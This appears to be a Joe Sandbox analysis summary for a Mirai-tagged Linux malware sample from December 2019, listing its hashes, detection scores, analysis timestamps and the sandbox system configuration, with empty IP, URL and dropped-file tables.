mxjzQQFgLp

Status: finished
Submission Time: 2019-12-13 09:56:06 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID: 195971
  • API (Web) ID: 289924
  • Analysis Started: 2019-12-13 09:57:57 +01:00
  • Analysis Finished: 2019-12-13 10:09:52 +01:00
  • MD5: 9a111588a7db15b796421bd13a949cd4
  • SHA1: 034c8c51a58be11ca620ce3eb0d43d5a59275d2f
  • SHA256: e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
  • Technologies:

Joe Sandbox

  • Detection: malicious
  • Score: 100
  • System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

  • Detection: malicious (Score: 24/58)
  • Detection: malicious (Score: 10/39)
  • Detection: malicious

IPs

IP Country Detection

URLs

Name Detection

Dropped files

Name File Type Hashes Detection